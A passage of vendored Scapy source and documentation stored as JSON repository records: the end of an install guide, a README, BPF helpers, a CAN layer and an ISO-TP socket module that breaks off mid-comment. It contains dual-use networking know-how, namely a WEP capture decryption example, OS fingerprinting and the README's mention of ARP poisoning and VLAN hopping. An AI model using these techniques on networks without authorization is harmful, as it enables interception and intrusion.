<http://weplab.sourceforge.net/caps/weplab-64bit-AA-managed.pcap>`_:\n\n Cryptography is installable via ``pip install cryptography``\n\n .. code-block:: python\n\n >>> enc=rdpcap(\"weplab-64bit-AA-managed.pcap\")\n >>> enc.show()\n >>> enc[0]\n >>> conf.wepkey=\"AA\\x00\\x00\\x00\"\n >>> dec=Dot11PacketList(enc).toEthernet()\n >>> dec.show()\n >>> dec[0]\n \n* PKI operations and TLS decryption. `cryptography <https://cryptography.io>`_ is also needed.\n\n* Fingerprinting. ``nmap_fp()`` needs `Nmap <http://nmap.org>`_. You need an `old version <http://nmap.org/dist-old/>`_ (before v4.23) that still supports first generation fingerprinting.\n\n .. code-block:: python \n \n >>> load_module(\"nmap\")\n >>> nmap_fp(\"192.168.0.1\")\n Begin emission:\n Finished to send 8 packets.\n Received 19 packets, got 4 answers, remaining 4 packets\n (0.88749999999999996, ['Draytek Vigor 2000 ISDN router'])\n\n* Queso is used withing the queso module: `queso-980922.tar.gz <http://www.packetstormsecurity.org/UNIX/scanners/queso-980922.tar.gz>`_. Extract the tar.gz file (e.g. 
using `7-Zip <http://www.7-zip.org/>`_) and put ``queso.conf`` into your Scapy directory\n\n.. index::\n single: VOIP\n \n* VOIP. ``voip_play()`` needs `SoX <http://sox.sourceforge.net/>`_.\n\nPlatform-specific instructions\n==============================\n\nLinux native\n------------\n\nScapy can run natively on Linux, without libdnet and libpcap.\n\n* Install `Python 2.7 or 3.4+ <http://www.python.org>`_.\n* Install `tcpdump <http://www.tcpdump.org>`_ and make sure it is in the $PATH. (It's only used to compile BPF filters (``-ddd option``))\n* Make sure your kernel has Packet sockets selected (``CONFIG_PACKET``)\n* If your kernel is < 2.6, make sure that Socket filtering is selected ``CONFIG_FILTER``) \n\nDebian/Ubuntu\n-------------\n\nJust use the standard packages::\n\n$ sudo apt-get install tcpdump graphviz imagemagick python-gnuplot python-cryptography python-pyx\n\nScapy optionally uses python-cryptography v1.7 or later. It has not been packaged for ``apt`` in less recent OS versions (e.g. Debian Jessie). If you need the cryptography-related methods, you may install the library with:\n\n.. code-block:: text\n\n # pip install cryptography\n\nFedora\n------\n\nHere's how to install Scapy on Fedora 9:\n\n.. code-block:: text\n\n # yum install git python-devel\n # cd /tmp\n # git clone https://github.com/secdev/scapy\n # cd scapy\n # python setup.py install\n \nSome optional packages:\n\n.. code-block:: text\n\n # yum install graphviz python-cryptography sox PyX gnuplot numpy\n # cd /tmp\n # wget http://heanet.dl.sourceforge.net/sourceforge/gnuplot-py/gnuplot-py-1.8.tar.gz\n # tar xvfz gnuplot-py-1.8.tar.gz\n # cd gnuplot-py-1.8\n # python setup.py install\n\n\nMac OS X\n--------\n\nOn Mac OS X, Scapy does not work natively. You need to install Python bindings\nto use libdnet and libpcap. You can choose to install using either Homebrew or\nMacPorts. They both work fine, yet Homebrew is used to run unit tests with\n`Travis CI <https://travis-ci.org>`_. \n\n\nInstall using Homebrew\n^^^^^^^^^^^^^^^^^^^^^^\n\n1. Update Homebrew::\n\n $ brew update\n\n2. Install Python bindings::\n\n\n $ brew install --with-python libdnet\n $ brew install https://raw.githubusercontent.com/secdev/scapy/master/.travis/pylibpcap.rb\n $ sudo brew install --with-python libdnet\n $ sudo brew install https://raw.githubusercontent.com/secdev/scapy/master/.travis/pylibpcap.rb\n\n\nInstall using MacPorts\n^^^^^^^^^^^^^^^^^^^^^^\n\n1. Update MacPorts::\n\n $ sudo port -d selfupdate\n\n2. Install Python bindings::\n\n $ sudo port install py-libdnet py-pylibpcap\n\n\nOpenBSD\n-------\n\nHere's how to install Scapy on OpenBSD 5.9+\n\n.. code-block:: text\n\n $ doas pkg_add py-libpcap py-libdnet git\n $ cd /tmp\n $ git clone http://github.com/secdev/scapy\n $ cd scapy\n $ doas python2.7 setup.py install\n\n\nOptional packages (OpenBSD only)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\npy-cryptography\n\n.. code-block:: text\n\n # pkg_add py-cryptography\n\ngnuplot and its Python binding: \n\n.. code-block:: text\n\n # pkg_add gnuplot py-gnuplot\n\nGraphviz (large download, will install several GNOME libraries)\n\n.. code-block:: text\n\n # pkg_add graphviz\n\n \nImageMagick (takes long to compile)\n\n.. code-block:: text\n\n # cd /tmp\n # ftp ftp://ftp.openbsd.org/pub/OpenBSD/4.3/ports.tar.gz \n # cd /usr\n # tar xvfz /tmp/ports.tar.gz \n # cd /usr/ports/graphics/ImageMagick/\n # make install\n\nPyX (very large download, will install texlive etc.)\n\n.. code-block:: text\n\n # pkg_add py-pyx\n\n/etc/ethertypes\n\n.. 
code-block:: text\n\n # wget http://git.netfilter.org/ebtables/plain/ethertypes -O /etc/ethertypes\n\npython-bz2 (for UTscapy)\n\n.. code-block:: text\n\n # pkg_add python-bz2 \n\n.. _windows_installation:\n\nWindows\n-------\n\n.. sectionauthor:: Dirk Loss <mail at dirk-loss.de>\n\nScapy is primarily being developed for Unix-like systems and works best on those platforms. But the latest version of Scapy supports Windows out-of-the-box. So you can use nearly all of Scapy's features on your Windows machine as well.\n\n.. note::\n If you update from Scapy-win v1.2.0.2 to Scapy v2 remember to use ``from scapy.all import *`` instead of ``from scapy import *``.\n\n.. image:: graphics/scapy-win-screenshot1.png\n :scale: 80\n :align: center\n\nYou need the following software packages in order to install Scapy on Windows:\n\n * `Python <http://www.python.org>`_: `Python 2.7.X or 3.4+ <https://www.python.org/downloads/>`_. After installation, add the Python installation directory and its \\Scripts subdirectory to your PATH. Depending on your Python version, the defaults would be ``C:\\Python27`` and ``C:\\Python27\\Scripts`` respectively.\n * `Npcap <https://nmap.org/npcap/>`_: `the latest version <https://nmap.org/npcap/#download>`_. Default values are recommanded. Scapy will also work with Winpcap.\n * `Scapy <http://www.secdev.org/projects/scapy/>`_: `latest development version <https://github.com/secdev/scapy/archive/master.zip>`_ from the `Git repository <https://github.com/secdev/scapy>`_. Unzip the archive, open a command prompt in that directory and run \"python setup.py install\". \n\nJust download the files and run the setup program. Choosing the default installation options should be safe.\n\nFor your convenience direct links are given to the version that is supported (Python 2.7 and 3.4+). If these links do not work or if you are using a different Python version (which will surely not work), just visit the homepage of the respective package and look for a Windows binary. As a last resort, search the web for the filename.\n\nAfter all packages are installed, open a command prompt (cmd.exe) and run Scapy by typing ``scapy``. If you have set the PATH correctly, this will find a little batch file in your ``C:\\Python27\\Scripts`` directory and instruct the Python interpreter to load Scapy.\n\nIf really nothing seems to work, consider skipping the Windows version and using Scapy from a Linux Live CD -- either in a virtual machine on your Windows host or by booting from CDROM: An older version of Scapy is already included in grml and BackTrack for example. While using the Live CD you can easily upgrade to the latest Scapy version by using the `above installation methods <#installing-scapy-v2-x>`_.\n\nScreenshot\n^^^^^^^^^^\n\n.. image:: graphics/scapy-win-screenshot2.png\n :scale: 80\n :align: center\n\nKnown bugs\n^^^^^^^^^^\n\n * You may not be able to capture WLAN traffic on Windows. Reasons are explained on the Wireshark wiki and in the WinPcap FAQ. Try switching off promiscuous mode with ``conf.sniff_promisc=False``.\n * Packets sometimes cannot be sent to localhost (or local IP addresses on your own host).\n \nWinpcap/Npcap conflicts\n^^^^^^^^^^^^^^^^^^^^^^^\n\nAs Winpcap is becoming old, it's recommended to use Npcap instead. Npcap is part of the Nmap project.\n\n1. If you get the message 'Winpcap is installed over Npcap.' 
it means that you have installed both winpcap and npcap versions, which isn't recommended.\n\nYou may **uninstall winpcap from your Program Files**, then you will need to remove:\n * C:/Windows/System32/wpcap.dll\n * C:/Windows/System32/Packet.dll\nAnd if you are on an x64 machine:\n * C:/Windows/SysWOW64/wpcap.dll\n * C:/Windows/SysWOW64/Packet.dll\n\nTo use npcap instead. Those files are not removed by the Winpcap un-installer.\n\n2. If you get the message 'The installed Windump version does not work with Npcap' it surely means that you have installed an old version of Windump.\nDownload the correct one on https://github.com/hsluoyz/WinDump/releases\n\nIn some cases, it could also mean that you had installed Npcap and Winpcap, and that Windump is using Winpcap. Fully delete Winpcap using the above method to solve the problem.\n\nBuild the documentation offline\n===============================\nThe Scapy project's documentation is written using reStructuredText (files \\*.rst) and can be built using\nthe `Sphinx <http://www.sphinx-doc.org/>`_ python library. The official online version is available\non `readthedocs <http://scapy.readthedocs.io/>`_.\n\nHTML version\n------------\nThe instructions to build the HTML version are: ::\n\n (activate a virtualenv)\n pip install sphinx\n cd doc/scapy\n make html\n\nYou can now open the resulting HTML file ``_build/html/index.html`` in your favorite web browser.\n\nTo use the ReadTheDocs' template, you will have to install the corresponding theme with: ::\n\n pip install sphinx_rtd_theme\n\nUML diagram\n-----------\nUsing ``pyreverse`` you can build a UML representation of the Scapy source code's object hierarchy. Here is an\nexample of how to build the inheritance graph for the Fields objects : ::\n\n (activate a virtualenv)\n pip install pylint\n cd scapy/\n pyreverse -o png -p fields scapy/fields.py\n\nThis will generate a ``classes_fields.png`` picture containing the inheritance hierarchy. 
Note that you can provide as many\nmodules or packages as you want, but the result will quickly get unreadable.\n\nTo see the dependencies between the DHCP layer and the ansmachine module, you can run: ::\n\n pyreverse -o png -p dhcp_ans scapy/ansmachine.py scapy/layers/dhcp.py scapy/packet.py\n\nIn this case, Pyreverse will also generate a ``packages_dhcp_ans.png`` showing the link between the different python modules provided.\n" }, { "alpha_fraction": 0.5867614150047302, "alphanum_fraction": 0.6058339476585388, "avg_line_length": 27.147367477416992, "blob_id": "5ec947f3b2cd52766ddc26fa5b4a393a6b8a293b", "content_id": "b7be99230724966f0a6b91639bbe6bffc2efb44a", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2674, "license_type": "permissive", "max_line_length": 84, "num_lines": 95, "path": "/scapy/scapy/arch/common.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Philippe Biondi <phil@secdev.org>\n# This program is published under a GPLv2 license\n\n\"\"\"\nFunctions common to different architectures\n\"\"\"\n\nimport socket\nfrom fcntl import ioctl\nimport os\nimport struct\nimport ctypes\nfrom ctypes import POINTER, Structure\nfrom ctypes import c_uint, c_uint32, c_ushort, c_ubyte\nfrom scapy.config import conf\nimport scapy.modules.six as six\n\n# UTILS\n\n\ndef get_if(iff, cmd):\n \"\"\"Ease SIOCGIF* ioctl calls\"\"\"\n\n sck = socket.socket()\n ifreq = ioctl(sck, cmd, struct.pack(\"16s16x\", iff.encode(\"utf8\")))\n sck.close()\n return ifreq\n\n# BPF HANDLERS\n\n\nclass bpf_insn(Structure):\n \"\"\"\"The BPF instruction data structure\"\"\"\n _fields_ = [(\"code\", c_ushort),\n (\"jt\", c_ubyte),\n (\"jf\", c_ubyte),\n (\"k\", c_uint32)]\n\n\nclass bpf_program(Structure):\n \"\"\"\"Structure for BIOCSETF\"\"\"\n _fields_ = [(\"bf_len\", c_uint),\n (\"bf_insns\", POINTER(bpf_insn))]\n\n\ndef _legacy_bpf_pointer(tcpdump_lines):\n \"\"\"Get old-format BPF Pointer. Deprecated\"\"\"\n X86_64 = os.uname()[4] in ['x86_64', 'aarch64']\n size = int(tcpdump_lines[0])\n bpf = b\"\"\n for l in tcpdump_lines[1:]:\n if six.PY2:\n int_type = long # noqa: F821\n else:\n int_type = int\n bpf += struct.pack(\"HBBI\", *map(int_type, l.split()))\n\n # Thanks to http://www.netprojects.de/scapy-with-pypy-solved/ for the pypy trick\n if conf.use_pypy:\n str_buffer = ctypes.create_string_buffer(bpf)\n return struct.pack('HL', size, ctypes.addressof(str_buffer))\n else:\n # XXX. Argl! We need to give the kernel a pointer on the BPF,\n # Python object header seems to be 20 bytes. 
36 bytes for x86 64bits arch.\n if X86_64:\n return struct.pack(\"HL\", size, id(bpf) + 36)\n else:\n return struct.pack(\"HI\", size, id(bpf) + 20)\n\n\ndef get_bpf_pointer(tcpdump_lines):\n \"\"\"Create a BPF Pointer for TCPDump filter\"\"\"\n if conf.use_pypy:\n return _legacy_bpf_pointer(tcpdump_lines)\n\n # Allocate BPF instructions\n size = int(tcpdump_lines[0])\n bpf_insn_a = bpf_insn * size\n bip = bpf_insn_a()\n\n # Fill the BPF instruction structures with the byte code\n tcpdump_lines = tcpdump_lines[1:]\n i = 0\n for line in tcpdump_lines:\n values = [int(v) for v in line.split()]\n bip[i].code = c_ushort(values[0])\n bip[i].jt = c_ubyte(values[1])\n bip[i].jf = c_ubyte(values[2])\n bip[i].k = c_uint(values[3])\n i += 1\n\n # Create the BPF program\n return bpf_program(size, bip)\n" }, { "alpha_fraction": 0.7306009531021118, "alphanum_fraction": 0.7455675601959229, "avg_line_length": 36.43965530395508, "blob_id": "54349fb6c7db2c07108105c10a3028568254b5fa", "content_id": "fb1738b249a3cf6f838fb2d0828c2f4f6545442e", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4343, "license_type": "permissive", "max_line_length": 201, "num_lines": 116, "path": "/scapy/README.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n <img src=\"doc/scapy_logo.png\" width=200>\n</p>\n\n# Scapy #\n\n[![Travis Build Status](https://travis-ci.org/secdev/scapy.svg?branch=master)](https://travis-ci.org/secdev/scapy)\n[![AppVeyor Build Status](https://ci.appveyor.com/api/projects/status/github/secdev/scapy?svg=true)](https://ci.appveyor.com/project/secdev/scapy)\n[![Codecov Status](https://codecov.io/gh/secdev/scapy/branch/master/graph/badge.svg)](https://codecov.io/gh/secdev/scapy)\n[![PyPI Version](https://img.shields.io/pypi/v/scapy.svg)](https://pypi.python.org/pypi/scapy/)\n[![Python Versions](https://img.shields.io/pypi/pyversions/scapy.svg)](https://pypi.python.org/pypi/scapy/)\n[![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](LICENSE)\n[![Join the chat at https://gitter.im/secdev/scapy](https://badges.gitter.im/secdev/scapy.svg)](https://gitter.im/secdev/scapy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n\nScapy is a powerful Python-based interactive packet manipulation program and\nlibrary.\n\nIt is able to forge or decode packets of a wide number of protocols, send them\non the wire, capture them, store or read them using pcap files, match requests\nand replies, and much more. It is designed to allow fast packet prototyping by\nusing default values that work.\n\nIt can easily handle most classical tasks like scanning, tracerouting, probing,\nunit tests, attacks or network discovery (it can replace `hping`, 85% of `nmap`,\n`arpspoof`, `arp-sk`, `arping`, `tcpdump`, `wireshark`, `p0f`, etc.). It also\nperforms very well at a lot of other specific tasks that most other tools can't\nhandle, like sending invalid frames, injecting your own 802.11 frames, combining\ntechniques (VLAN hopping+ARP cache poisoning, VoIP decoding on WEP protected\nchannel, ...), etc.\n\nScapy supports Python 2.7 and Python 3 (3.4 to 3.6). 
It's intended to\nbe cross platform, and runs on many different platforms (Linux, OSX,\n*BSD, and Windows).\n\n## Hands-on ##\n\n### Interactive shell ###\n\nScapy can easily be used as an interactive shell to interact with the network.\nThe following example shows how to send an ICMP Echo Request message to\n`github.com`, then display the reply source IP address:\n\n```python\nsudo ./run_scapy \nWelcome to Scapy\n>>> p = IP(dst=\"github.com\")/ICMP()\n>>> r = sr1(p)\nBegin emission:\n.Finished to send 1 packets.\n*\nReceived 2 packets, got 1 answers, remaining 0 packets\n>>> r[IP].src\n'192.30.253.113'\n```\n\n### Python module ###\n\nIt is straightforward to use Scapy as a regular Python module, for example to\ncheck if a TCP port is opened. First, save the following code in a file names\n`send_tcp_syn.py`\n\n```python\nfrom scapy.all import *\nconf.verb = 0\n\np = IP(dst=\"github.com\")/TCP()\nr = sr1(p)\nprint(r.summary())\n```\n\nThen, launch the script with:\n```python\nsudo python send_tcp_syn.py\nIP / TCP 192.30.253.113:http > 192.168.46.10:ftp_data SA / Padding\n```\n\n### Resources ###\n\nTo begin with Scapy, you should check [the notebook\nhands-on](doc/notebooks/Scapy%20in%2015%20minutes.ipynb) and the [interactive\ntutorial](http://scapy.readthedocs.io/en/latest/usage.html#interactive-tutorial).\nIf you want to learn more, see [the quick demo: an interactive\nsession](http://scapy.readthedocs.io/en/latest/introduction.html#quick-demo)\n(some examples may be outdated), or play with the\n[HTTP/2](doc/notebooks/HTTP_2_Tuto.ipynb) and [TLS](doc/notebooks/tls)\nnotebooks.\n\nThe [documentation](http://scapy.readthedocs.io/en/latest/) contains more\nadvanced use cases, and examples.\n\n## Installation ##\n\nScapy works without any external Python modules on Linux and BSD like operating\nsystems. On Windows, you need to install some mandatory dependencies as\ndescribed in [the\ndocumentation](http://scapy.readthedocs.io/en/latest/installation.html#windows).\n\nOn most systems, using Scapy is as simple as running the following commands:\n```\ngit clone https://github.com/secdev/scapy\ncd scapy\n./run_scapy\n>>>\n```\n\nTo benefit from all Scapy features, such as plotting, you might want to install\nPython modules, such as `matplotlib` or `cryptography`. See the\n[documentation](http://scapy.readthedocs.io/en/latest/installation.html) and\nfollow the instructions to install them.\n\n[//]: # (stop_pypi_description)\n## Contributing ##\n\nWant to contribute? Great! Please take a few minutes to\n[read this](CONTRIBUTING.md)!\n" }, { "alpha_fraction": 0.6257359385490417, "alphanum_fraction": 0.6291000843048096, "avg_line_length": 36.15625, "blob_id": "537166c5d4276811ab35b0bfcb01a41fb18ae61f", "content_id": "44459524506ddd5be843375ff08958300ba4c97c", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3567, "license_type": "permissive", "max_line_length": 105, "num_lines": 96, "path": "/scapy/scapy/layers/can.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Philippe Biondi <phil@secdev.org>\n# This program is published under a GPLv2 license\n\n\n\"\"\"A minimal implementation of the CANopen protocol, based on\nWireshark dissectors. 
See https://wiki.wireshark.org/CANopen\n\n\"\"\"\n\nimport struct\nimport scapy.modules.six as six\nfrom scapy.compat import *\nfrom scapy.config import conf\nfrom scapy.data import DLT_CAN_SOCKETCAN\nfrom scapy.fields import BitField, FieldLenField, FlagsField, StrLenField, \\\n ThreeBytesField, XBitField\nfrom scapy.packet import Packet, bind_layers, RawVal\nfrom scapy.layers.l2 import CookedLinux\n\n\n# Mimics the Wireshark CAN dissector parameter 'Byte-swap the CAN ID/flags field'\n# set to True when working with PF_CAN sockets\nconf.contribs['CAN'] = {'swap-bytes': False}\n\n\nclass CAN(Packet):\n \"\"\"A minimal implementation of the CANopen protocol, based on\n Wireshark dissectors. See https://wiki.wireshark.org/CANopen\n\n \"\"\"\n fields_desc = [\n FlagsField('flags', 0, 3, ['error', 'remote_transmission_request', 'extended']),\n XBitField('identifier', 0, 29),\n FieldLenField('length', None, length_of='data', fmt='B'),\n ThreeBytesField('reserved', 0),\n StrLenField('data', '', length_from=lambda pkt: pkt.length),\n ]\n\n @staticmethod\n def inv_endianness(pkt):\n \"\"\" Invert the order of the first four bytes of a CAN packet\n\n This method is meant to be used specifically to convert a CAN packet\n between the pcap format and the socketCAN format\n\n :param pkt: str of the CAN packet\n :return: packet str with the first four bytes swapped\n \"\"\"\n len_partial = len(pkt) - 4 # len of the packet, CAN ID excluded\n return struct.pack('<I{}s'.format(len_partial), *struct.unpack('>I{}s'.format(len_partial), pkt))\n\n def pre_dissect(self, s):\n \"\"\" Implements the swap-bytes functionality when dissecting \"\"\"\n if conf.contribs['CAN']['swap-bytes']:\n return CAN.inv_endianness(s)\n return s\n\n def self_build(self, field_pos_list=None):\n \"\"\" Implements the swap-bytes functionality when building\n\n this is based on a copy of the Packet.self_build default method.\n The goal is to affect only the CAN layer data and keep\n under layers (e.g LinuxCooked) unchanged\n \"\"\"\n if self.raw_packet_cache is not None:\n for fname, fval in six.iteritems(self.raw_packet_cache_fields):\n if self.getfieldval(fname) != fval:\n self.raw_packet_cache = None\n self.raw_packet_cache_fields = None\n break\n if self.raw_packet_cache is not None:\n if conf.contribs['CAN']['swap-bytes']:\n return CAN.inv_endianness(self.raw_packet_cache)\n return self.raw_packet_cache\n p = b\"\"\n for f in self.fields_desc:\n val = self.getfieldval(f.name)\n if isinstance(val, RawVal):\n sval = raw(val)\n p += sval\n if field_pos_list is not None:\n field_pos_list.append((f.name, sval.encode('string_escape'), len(p), len(sval)))\n else:\n p = f.addfield(self, p, val)\n if conf.contribs['CAN']['swap-bytes']:\n return CAN.inv_endianness(p)\n return p\n\n def extract_padding(self, p):\n return b'', p\n\n\nconf.l2types.register(DLT_CAN_SOCKETCAN, CAN)\nbind_layers(CookedLinux, CAN, proto=12)\n" }, { "alpha_fraction": 0.5031259655952454, "alphanum_fraction": 0.5182220339775085, "avg_line_length": 37.017391204833984, "blob_id": "621b4bd256e40f497cd5a9845e639b2a0f3bf3f1", "content_id": "80382b90206d74effb31414702fb3decf5b42796", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13116, "license_type": "permissive", "max_line_length": 86, "num_lines": 345, "path": "/scapy/scapy/contrib/isotp.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env python\n\n# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Nils Weiss <nils@we155.de>\n# This program is published under a GPLv2 license\n\n\"\"\"\nISOTPSocket.\n\"\"\"\n\n\nimport ctypes\nfrom ctypes.util import find_library\nimport struct\nimport socket\nimport time\n\nimport scapy.modules.six as six\nfrom scapy.error import Scapy_Exception, warning\nfrom scapy.packet import Packet\nfrom scapy.fields import StrField\nfrom scapy.supersocket import SuperSocket\nfrom scapy.sendrecv import sndrcv, sniff\nfrom scapy.arch.linux import get_last_packet_timestamp, SIOCGIFINDEX\nfrom scapy.config import conf\nfrom scapy.consts import WINDOWS\n\nif six.PY2:\n Scapy_Exception(\"ISOTP is not supported on python2, yet. \"\n \"Switch to python3 and try it again.\")\n\n\nif not WINDOWS:\n LIBC = ctypes.cdll.LoadLibrary(find_library(\"c\"))\n warning(\"Loading libc with ctypes\")\nelse:\n warning(\"libc is unavailable\")\n\n\n\"\"\"\nISOTP Packet\n\"\"\"\n\n\nclass ISOTP(Packet):\n name = 'ISOTP'\n fields_desc = [\n StrField('data', B\"\")\n ]\n\n def hashret(self):\n return self.payload.hashret()\n\n def answers(self, other):\n if other.__class__ == self.__class__:\n return self.payload.answers(other.payload)\n return 0\n\n\nCAN_MTU = 16\nCAN_MAX_DLEN = 8\n\nCAN_ISOTP = 6 # ISO 15765-2 Transport Protocol\n\nSOL_CAN_ISOTP = (socket.SOL_CAN_BASE + CAN_ISOTP)\n# /* for socket options affecting the socket (not the global system) */\nCAN_ISOTP_OPTS = 1 # /* pass struct can_isotp_options */\nCAN_ISOTP_RECV_FC = 2 # /* pass struct can_isotp_fc_options */\n\n# /* sockopts to force stmin timer values for protocol regression tests */\nCAN_ISOTP_TX_STMIN = 3 # /* pass __u32 value in nano secs */\nCAN_ISOTP_RX_STMIN = 4 # /* pass __u32 value in nano secs */\nCAN_ISOTP_LL_OPTS = 5 # /* pass struct can_isotp_ll_options */\n\nCAN_ISOTP_LISTEN_MODE = 0x001 # /* listen only (do not send FC) */\nCAN_ISOTP_EXTEND_ADDR = 0x002 # /* enable extended addressing */\nCAN_ISOTP_TX_PADDING = 0x004 # /* enable CAN frame padding tx path */\nCAN_ISOTP_RX_PADDING = 0x008 # /* enable CAN frame padding rx path */\nCAN_ISOTP_CHK_PAD_LEN = 0x010 # /* check received CAN frame padding */\nCAN_ISOTP_CHK_PAD_DATA = 0x020 # /* check received CAN frame padding */\nCAN_ISOTP_HALF_DUPLEX = 0x040 # /* half duplex error state handling */\nCAN_ISOTP_FORCE_TXSTMIN = 0x080 # /* ignore stmin from received FC */\nCAN_ISOTP_FORCE_RXSTMIN = 0x100 # /* ignore CFs depending on rx stmin */\nCAN_ISOTP_RX_EXT_ADDR = 0x200 # /* different rx extended addressing */\n\n# /* default values */\nCAN_ISOTP_DEFAULT_FLAGS = 0\nCAN_ISOTP_DEFAULT_EXT_ADDRESS = 0x00\nCAN_ISOTP_DEFAULT_PAD_CONTENT = 0xCC # /* prevent bit-stuffing */\nCAN_ISOTP_DEFAULT_FRAME_TXTIME = 0\nCAN_ISOTP_DEFAULT_RECV_BS = 0\nCAN_ISOTP_DEFAULT_RECV_STMIN = 0x00\nCAN_ISOTP_DEFAULT_RECV_WFTMAX = 0\nCAN_ISOTP_DEFAULT_LL_MTU = CAN_MTU\nCAN_ISOTP_DEFAULT_LL_TX_DL = CAN_MAX_DLEN\nCAN_ISOTP_DEFAULT_LL_TX_FLAGS = 0\n\n\nclass SOCKADDR(ctypes.Structure):\n # See /usr/include/i386-linux-gnu/bits/socket.h for original struct\n _fields_ = [(\"sa_family\", ctypes.c_uint16),\n (\"sa_data\", ctypes.c_char * 14)]\n\n\nclass TP(ctypes.Structure):\n # This struct is only used within the SOCKADDR_CAN struct\n _fields_ = [(\"rx_id\", ctypes.c_uint32),\n (\"tx_id\", ctypes.c_uint32)]\n\n\nclass ADDR_INFO(ctypes.Union):\n # This struct is only used within the SOCKADDR_CAN struct\n # This union is to future proof for future can address 
information\n _fields_ = [(\"tp\", TP)]\n\n\nclass SOCKADDR_CAN(ctypes.Structure):\n # See /usr/include/linux/can.h for original struct\n _fields_ = [(\"can_family\", ctypes.c_uint16),\n (\"can_ifindex\", ctypes.c_int),\n (\"can_addr\", ADDR_INFO)]\n\n\nclass IFREQ(ctypes.Structure):\n # The two fields in this struct were originally unions.\n # See /usr/include/net/if.h for original struct\n _fields_ = [(\"ifr_name\", ctypes.c_char * 16),\n (\"ifr_ifindex\", ctypes.c_int)]\n\n\nclass ISOTPSocket(SuperSocket):\n desc = \"read/write packets at a given CAN interface using CAN_ISOTP socket\"\n can_isotp_options_fmt = \"@2I4B\"\n can_isotp_fc_options_fmt = \"@3B\"\n can_isotp_ll_options_fmt = \"@3B\"\n sockaddr_can_fmt = \"@H3I\"\n\n def __build_can_isotp_options(\n self,\n flags=CAN_ISOTP_DEFAULT_FLAGS,\n frame_txtime=0,\n ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS,\n txpad_content=0,\n rxpad_content=0,\n rx_ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS):\n return struct.pack(self.can_isotp_options_fmt,\n flags,\n frame_txtime,\n ext_address,\n txpad_content,\n rxpad_content,\n rx_ext_address)\n\n # == Must use native not standard types for packing ==\n # struct can_isotp_options {\n # __u32 flags; /* set flags for isotp behaviour. */\n # /* __u32 value : flags see below */\n #\n # __u32 frame_txtime; /* frame transmission time (N_As/N_Ar) */\n # /* __u32 value : time in nano secs */\n #\n # __u8 ext_address; /* set address for extended addressing */\n # /* __u8 value : extended address */\n #\n # __u8 txpad_content; /* set content of padding byte (tx) */\n # /* __u8 value : content on tx path */\n #\n # __u8 rxpad_content; /* set content of padding byte (rx) */\n # /* __u8 value : content on rx path */\n #\n # __u8 rx_ext_address; /* set address for extended addressing */\n # /* __u8 value : extended address (rx) */\n # };\n\n def __build_can_isotp_fc_options(self,\n bs=CAN_ISOTP_DEFAULT_RECV_BS,\n stmin=CAN_ISOTP_DEFAULT_RECV_STMIN,\n wftmax=CAN_ISOTP_DEFAULT_RECV_WFTMAX):\n return struct.pack(self.can_isotp_fc_options_fmt,\n bs,\n stmin,\n wftmax)\n # == Must use native not standard types for packing ==\n # struct can_isotp_fc_options {\n #\n # __u8 bs; /* blocksize provided in FC frame */\n # /* __u8 value : blocksize. 0 = off */\n #\n # __u8 stmin; /* separation time provided in FC frame */\n # /* __u8 value : */\n # /* 0x00 - 0x7F : 0 - 127 ms */\n # /* 0x80 - 0xF0 : reserved */\n # /* 0xF1 - 0xF9 : 100 us - 900 us */\n # /* 0xFA - 0xFF : reserved */\n #\n # __u8 wftmax; /* max. number of wait frame transmiss. */\n # /* __u8 value : 0 = omit FC N_PDU WT */\n # };\n\n def __build_can_isotp_ll_options(self,\n mtu=CAN_ISOTP_DEFAULT_LL_MTU,\n tx_dl=CAN_ISOTP_DEFAULT_LL_TX_DL,\n tx_flags=CAN_ISOTP_DEFAULT_LL_TX_FLAGS):\n return struct.pack(self.can_isotp_ll_options_fmt,\n mtu,\n tx_dl,\n tx_flags)\n\n # == Must use native not standard types for packing ==\n # struct can_isotp_ll_options {\n #\n # __u8 mtu; /* generated & accepted CAN frame type */\n # /* __u8 value : */\n # /* CAN_MTU (16) -> standard CAN 2.0 */\n # /* CANFD_MTU (72) -> CAN FD frame */\n #\n # __u8 tx_dl; /* tx link layer data length in bytes */\n # /* (configured maximum payload length) */\n # /* __u8 value : 8,12,16,20,24,32,48,64 */\n # /* => rx path supports all LL_DL values */\n #\n # __u8 tx_flags; /* set into struct canfd_frame.flags */\n # /* at frame creation: e.g. 
